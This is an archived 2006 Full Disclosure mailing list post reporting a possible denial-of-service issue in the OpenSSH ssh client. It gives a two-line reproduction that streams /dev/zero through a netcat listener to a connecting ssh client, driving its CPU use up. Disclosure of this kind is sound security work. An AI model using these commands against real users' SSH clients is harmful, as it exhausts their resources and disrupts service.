Full Disclosure mailing list archives

Possible DOS issue in OpenSSH ssh client

From: Espen Grøndahl <espen () espen mine nu>
Date: Tue, 13 Jun 2006 14:54:51 +0200

During some testing I found a possible bug/issue with OpenSSH ssh client.

 

 

MachineA # cat < /dev/zero | nc l p 3000

 

MachineB# ssh someone@MachineA p 3000

 

I have tested on OpenBSD 3.9, CentOS 4.3, Debian 3.1 and Solaris 9.

 

 

This consumes 50-100% of available CPU time on MachineB ( depending on the
bandwith between them ).

 

This could be used in a denial of service attack  or could be used to stop
( or at least annoy ) ssh bruteforcers :-)

 

But of course it would also consume my upstream bandwith.

 

 

Espen

 

http://espen.mine.nu <http://espen.mine.nu/>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Possible DOS issue in OpenSSH ssh client Espen Grøndahl (Jun 13)
- Re: Possible DOS issue in OpenSSH ssh client Paul Schmehl (Jun 13)
- Re: Possible DOS issue in OpenSSH ssh client kaosone (Jun 13)
- <Possible follow-ups>
- Possible DOS issue in OpenSSH ssh client Espen Grøndahl (Jun 13)